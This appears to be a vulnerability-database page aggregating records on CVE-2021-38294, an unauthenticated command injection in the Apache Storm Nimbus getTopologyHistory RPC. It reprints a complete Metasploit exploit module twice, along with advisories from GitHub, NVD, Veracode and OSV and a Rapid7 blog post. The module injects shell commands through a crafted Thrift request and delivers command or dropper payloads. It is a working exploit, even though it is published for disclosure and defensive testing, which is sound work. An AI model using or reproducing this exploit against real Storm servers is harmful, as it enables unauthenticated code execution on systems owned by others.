Apache Storm Nimbus 2.2.0 Command Execution

2021-11-19T00:00:00

Description

{"id": "PACKETSTORM:165019", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Apache Storm Nimbus 2.2.0 Command Execution", "description": "", "published": "2021-11-19T00:00:00", "modified": "2021-11-19T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/165019/Apache-Storm-Nimbus-2.2.0-Command-Execution.html", "reporter": "Spencer McIntyre", "references": [], "cvelist": ["CVE-2021-38294"], "immutableFields": [], "lastseen": "2021-11-19T16:57:06", "viewCount": 318, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-38294"]}, {"type": "github", "idList": ["GHSA-6768-MCJC-8223"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:DB7AC7E9278AED114B1BBA8DC96DD124"]}, {"type": "zdt", "idList": ["1337DAY-ID-37060"]}], "rev": 4}, "score": {"value": 5.4, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-38294"]}, {"type": "github", "idList": ["GHSA-6768-MCJC-8223"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:DB7AC7E9278AED114B1BBA8DC96DD124"]}, {"type": "zdt", "idList": ["1337DAY-ID-37060"]}]}, "exploitation": null, "vulnersScore": 5.4}, "sourceHref": "https://packetstormsecurity.com/files/download/165019/nimbus_gettopologyhistory_cmd_exec.rb.txt", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'rex/proto/thrift' \nrequire 'rex/stopwatch' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::CmdStager \n \nThrift = Rex::Proto::Thrift \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Apache Storm Nimbus getTopologyHistory Unauthenticated Command Execution', \n'Description' => %q{ \nThis module exploits an unauthenticated command injection vulnerability within the Nimbus service component of Apache Storm. \nThe getTopologyHistory RPC method method takes a single argument which is the name of a user which is \nconcatenated into a string that is executed by bash. In order for the vulnerability to be exploitable, there \nmust have been at least one topology submitted to the server. The topology may be active or inactive, but at \nleast one must be present. Successful exploitation results in remote code execution as the user running Apache Storm. \n \nThis vulnerability was patched in versions 2.1.1, 2.2.1 and 1.2.4. This exploit was tested on version 2.2.0 \nwhich is affected. \n}, \n'Author' => [ \n'Alvaro Mu\u00f1oz', # discovery and original research \n'Spencer McIntyre', # metasploit module \n], \n'References' => [ \n['CVE', '2021-38294'], \n['URL', 'https://securitylab.github.com/advisories/GHSL-2021-085-apache-storm/'] \n], \n'DisclosureDate' => '2021-10-25', \n'License' => MSF_LICENSE, \n'Platform' => ['linux', 'unix'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper \n} \n] \n], \n'DefaultTarget' => 1, \n'DefaultOptions' => { \n'RPORT' => 6627, \n'MeterpreterTryToFork' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \nend \n \ndef check \nbegin \nconnect \nrescue Rex::ConnectionError \nreturn CheckCode::Unknown('Failed to connect to the service.') \nend \n \nsleep_time = rand(5..10) \nresponse, elapsed_time = Rex::Stopwatch.elapsed_time do \nexecute_command(\"sleep #{sleep_time}\", { disconnect: false }) \nrecv_response(sleep_time + 5) \nend \ndisconnect \n \nvprint_status(\"Elapsed time: #{elapsed_time} seconds\") \n \nunless response && elapsed_time > sleep_time \nreturn CheckCode::Safe('Failed to test command injection.') \nend \n \nCheckCode::Appears('Successfully tested command injection.') \nend \n \ndef exploit \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, opts = {}) \n# comment out the rest of the command to ensure it's only executed once and prefix a random tag to avoid caching \ncmd = \"#{cmd} ##{Rex::Text.rand_text_alphanumeric(4..8)}\" \nvprint_status(\"Executing command: #{cmd}\") \n \nsend_request([ \nThrift::Header.new(message_type: Thrift::MessageType::CALL, method_name: 'getTopologyHistory'), \nThrift::Data.new(data_type: Thrift::DataType::T_UTF7, field_id: 1, data_value: \";#{cmd}\"), \nThrift::Data.new \n].map(&:to_binary_s).join) \ndisconnect if opts.fetch(:disconnect, true) \nend \n \ndef send_request(request) \nconnect if sock.nil? \nsock.put([ request.length ].pack('N') + request) \nend \n \ndef recv_response(timeout) \nremaining = timeout \nres_size, elapsed = Rex::Stopwatch.elapsed_time do \nsock.timed_read(4, remaining) \nend \n \nremaining -= elapsed \nreturn nil if res_size.nil? || res_size.length != 4 || remaining <= 0 \n \nres = sock.timed_read(res_size.unpack1('N'), remaining) \n \nreturn nil if res.nil? || res.length != res_size.unpack1('N') \n \nreturn res_size + res \nrescue Timeout::Error \nreturn nil \nend \nend \n`\n", "_state": {"dependencies": 1646108597}}

{"github": [{"lastseen": "2022-04-15T14:32:17", "description": "A Command Injection vulnerability exists in the getTopologyHistory service of the Apache Storm 2.x prior to 2.2.1 and Apache Storm 1.x prior to 1.2.4. A specially crafted thrift request to the Nimbus server allows Remote Code Execution (RCE) prior to authentication.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-27T18:51:22", "type": "github", "title": "Command injection leading to Remote Code Execution in Apache Storm", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38294"], "modified": "2021-11-24T19:39:08", "id": "GHSA-6768-MCJC-8223", "href": "https://github.com/advisories/GHSA-6768-mcjc-8223", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2022-05-12T00:15:04", "description": "storm-server is vulnerable to command injection. The vulnerability exists due to the usage of `getTopologyHistory` service which allows malicious users to execute commands without prior authentication.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-26T05:42:55", "type": "veracode", "title": "Command Injection ", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38294"], "modified": "2021-11-23T22:10:31", "id": "VERACODE:32717", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-32717/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2022-06-10T04:57:47", "description": "A Command Injection vulnerability exists in the getTopologyHistory service of the Apache Storm 2.x prior to 2.2.1 and Apache Storm 1.x prior to 1.2.4. A specially crafted thrift request to the Nimbus server allows Remote Code Execution (RCE) prior to authentication.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-27T18:51:22", "type": "osv", "title": "Command injection leading to Remote Code Execution in Apache Storm", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38294"], "modified": "2022-06-10T02:17:03", "id": "OSV:GHSA-6768-MCJC-8223", "href": "https://osv.dev/vulnerability/GHSA-6768-mcjc-8223", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T18:58:55", "description": "A Command Injection vulnerability exists in the getTopologyHistory service of the Apache Storm 2.x prior to 2.2.1 and Apache Storm 1.x prior to 1.2.4. A specially crafted thrift request to the Nimbus server allows Remote Code Execution (RCE) prior to authentication.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-25T13:15:00", "type": "cve", "title": "CVE-2021-38294", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38294"], "modified": "2021-11-23T19:44:00", "cpe": [], "id": "CVE-2021-38294", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-38294", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "zdt": [{"lastseen": "2021-12-25T11:17:52", "description": "This Metasploit module exploits an unauthenticated command injection vulnerability within the Nimbus service component of Apache Storm. The getTopologyHistory RPC method method takes a single argument which is the name of a user which is concatenated into a string that is executed by bash. In order for the vulnerability to be exploitable, there must have been at least one topology submitted to the server. The topology may be active or inactive, but at least one must be present. Successful exploitation results in remote code execution as the user running Apache Storm. This vulnerability was patched in versions 2.1.1, 2.2.1 and 1.2.4. This exploit was tested on version 2.2.0 which is affected.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-20T00:00:00", "type": "zdt", "title": "Apache Storm Nimbus 2.2.0 Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38294"], "modified": "2021-11-20T00:00:00", "id": "1337DAY-ID-37060", "href": "https://0day.today/exploit/description/37060", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/thrift'\nrequire 'rex/stopwatch'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::CmdStager\n\n Thrift = Rex::Proto::Thrift\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Apache Storm Nimbus getTopologyHistory Unauthenticated Command Execution',\n 'Description' => %q{\n This module exploits an unauthenticated command injection vulnerability within the Nimbus service component of Apache Storm.\n The getTopologyHistory RPC method method takes a single argument which is the name of a user which is\n concatenated into a string that is executed by bash. In order for the vulnerability to be exploitable, there\n must have been at least one topology submitted to the server. The topology may be active or inactive, but at\n least one must be present. Successful exploitation results in remote code execution as the user running Apache Storm.\n\n This vulnerability was patched in versions 2.1.1, 2.2.1 and 1.2.4. This exploit was tested on version 2.2.0\n which is affected.\n },\n 'Author' => [\n 'Alvaro Mu\u00f1oz', # discovery and original research\n 'Spencer McIntyre', # metasploit module\n ],\n 'References' => [\n ['CVE', '2021-38294'],\n ['URL', 'https://securitylab.github.com/advisories/GHSL-2021-085-apache-storm/']\n ],\n 'DisclosureDate' => '2021-10-25',\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux', 'unix'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DefaultOptions' => {\n 'RPORT' => 6627,\n 'MeterpreterTryToFork' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n end\n\n def check\n begin\n connect\n rescue Rex::ConnectionError\n return CheckCode::Unknown('Failed to connect to the service.')\n end\n\n sleep_time = rand(5..10)\n response, elapsed_time = Rex::Stopwatch.elapsed_time do\n execute_command(\"sleep #{sleep_time}\", { disconnect: false })\n recv_response(sleep_time + 5)\n end\n disconnect\n\n vprint_status(\"Elapsed time: #{elapsed_time} seconds\")\n\n unless response && elapsed_time > sleep_time\n return CheckCode::Safe('Failed to test command injection.')\n end\n\n CheckCode::Appears('Successfully tested command injection.')\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, opts = {})\n # comment out the rest of the command to ensure it's only executed once and prefix a random tag to avoid caching\n cmd = \"#{cmd} ##{Rex::Text.rand_text_alphanumeric(4..8)}\"\n vprint_status(\"Executing command: #{cmd}\")\n\n send_request([\n Thrift::Header.new(message_type: Thrift::MessageType::CALL, method_name: 'getTopologyHistory'),\n Thrift::Data.new(data_type: Thrift::DataType::T_UTF7, field_id: 1, data_value: \";#{cmd}\"),\n Thrift::Data.new\n ].map(&:to_binary_s).join)\n disconnect if opts.fetch(:disconnect, true)\n end\n\n def send_request(request)\n connect if sock.nil?\n sock.put([ request.length ].pack('N') + request)\n end\n\n def recv_response(timeout)\n remaining = timeout\n res_size, elapsed = Rex::Stopwatch.elapsed_time do\n sock.timed_read(4, remaining)\n end\n\n remaining -= elapsed\n return nil if res_size.nil? || res_size.length != 4 || remaining <= 0\n\n res = sock.timed_read(res_size.unpack1('N'), remaining)\n\n return nil if res.nil? || res.length != res_size.unpack1('N')\n\n return res_size + res\n rescue Timeout::Error\n return nil\n end\nend\n", "sourceHref": "https://0day.today/exploit/37060", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2021-11-26T19:03:33", "description": "## Self-Service Remote Code Execution\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/11/metasploit-ascii-1-2.png)\n\nThis week, our own [@wvu-r7](<https://github.com/wvu-r7>) added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/15874>) that achieves unauthenticated remote code execution in ManageEngine ADSelfService Plus, a self-service password management and single sign-on solution for Active Directory. This new module leverages a REST API authentication bypass vulnerability identified as [CVE-2021-40539](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539?referrer=blog>), where an error in the REST API URL normalization routine makes it possible to bypass security filters and upload arbitrary files on the target. wvu\u2019s new module simply uploads a Java payload to the target and executes it, granting code execution as SYSTEM if ManageEngine ADSelfService Plus was started as a service.\n\n## Storm Alert\n\nWarning, this is not a drill! A critical unauthenticated command injection vulnerability is approaching the Nimbus service component of Apache Storm and has been given the name [CVE-2021-38294](<https://attackerkb.com/topics/xvmqwPRnm5/cve-2021-38294?referrer=blog>). A new exploit [module](<https://github.com/rapid7/metasploit-framework/pull/15866>) authored by our very own [zeroSteiner](<https://github.com/zeroSteiner>) has landed and will exploit this vulnerability to get you OS command execution as the user that started the Nimbus service. Please, evacuate the area immediately!\n\n## Metasploit Community CTF 2021\n\nWe're happy to announce this year\u2019s CTF will start on Friday, December 3, 2021! Similar to last year, the game has been designed to be accessible to beginners who want to learn and connect with the community. Keep in mind that while a team can have unlimited members, only 1,000 team spots are available, and once they\u2019re gone you will have to join someone else\u2019s team. You can find the full details in our [blog post](<https://www.rapid7.com/blog/post/2021/11/16/announcing-the-2021-metasploit-community-ctf/>).\n\n## New module content (2)\n\n * [Apache Storm Nimbus getTopologyHistory Unauthenticated Command Execution](<https://github.com/rapid7/metasploit-framework/pull/15866>) by [Alvaro Mu\u00f1oz](<https://github.com/pwntester>) and [Spencer McIntyre](<https://github.com/zeroSteiner>), which exploits [CVE-2021-38294](<https://attackerkb.com/topics/xvmqwPRnm5/cve-2021-38294?referrer=blog>) \\- This adds an exploit for CVE-2021-38294 which is an unauthenticated remote command execution vulnerability within the `getTopologyHistory()` RPC method that is provided by the Nimbus service which is a component of the Apache Storm project. In order to be exploitable, at least one topology must have been submitted to the Storm cluster. It may be active or inactive but one must be present.\n * [ManageEngine ADSelfService Plus CVE-2021-40539](<https://github.com/rapid7/metasploit-framework/pull/15874>) by [wvu](<https://github.com/wvu-r7>), [Antoine Cervoise](<https://github.com/cervoise>), [Wilfried B\u00e9card](<https://github.com/wilfried-becard>), and [mr_me](<https://github.com/stevenseeley>), which exploits [CVE-2021-40539](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539?referrer=blog>) \\- This adds an exploit for CVE-2021-40539 which is an unauthenticated RCE within the ManageEngine ADSelfService application.\n\n## Enhancements and features\n\n * [#15887](<https://github.com/rapid7/metasploit-framework/pull/15887>) from [smashery](<https://github.com/smashery>) \\- The path expansion code has been expanded to support path-based tab completion. Users should now tab-complete things such as `cat ~/some_filenam<tab>`.\n * [#15889](<https://github.com/rapid7/metasploit-framework/pull/15889>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- An update has been made to library code so that terminal resize events are only sent if the Meterpreter client supports it. Additionally, extra feedback is now provided to users on whether or not terminal resizing is handled automatically or if they should adjust it manually.\n * [#15898](<https://github.com/rapid7/metasploit-framework/pull/15898>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- Ruby 3.x removes support for `URI.encode` and `URI.escape`. This PR replaces uses of these functions in modules with calls to `URI::DEFAULT_PARSER.escape` so that Ruby 3 can run these modules instead of raising errors about missing functions.\n * [#15899](<https://github.com/rapid7/metasploit-framework/pull/15899>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- This improves the user experience when `shell` is invoked from a Meterpreter session. Now, when the `fully_interactive_shells` feature is enabled, a message is displayed to inform the operator that a fully interactive TTY is supported. Note that you can start it by invoking `shell -it`.\n\n## Bugs fixed\n\n * [#15864](<https://github.com/rapid7/metasploit-framework/pull/15864>) from [timwr](<https://github.com/timwr>) \\- A bug has been fixed whereby the `sessions -u` command would not return a x64 Meterpreter session on a x64 Windows host, and would instead return a x86 session. This issue has now been addressed so that `sessions -u` will determine the architecture of the target host prior to upgrading and will generate a new Meterpreter session of the appropriate architecture.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.15...6.1.16](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-11-17T15%3A27%3A48-06%3A00..2021-11-24T18%3A00%3A22-06%3A00%22>)\n * [Full diff 6.1.15...6.1.16](<https://github.com/rapid7/metasploit-framework/compare/6.1.15...6.1.16>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-26T17:21:03", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38294", "CVE-2021-40539"], "modified": "2021-11-26T17:21:03", "id": "RAPID7BLOG:DB7AC7E9278AED114B1BBA8DC96DD124", "href": "https://blog.rapid7.com/2021/11/26/metasploit-wrap-up-140/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}

Apache Storm Nimbus 2.2.0 Command Execution

Description

Related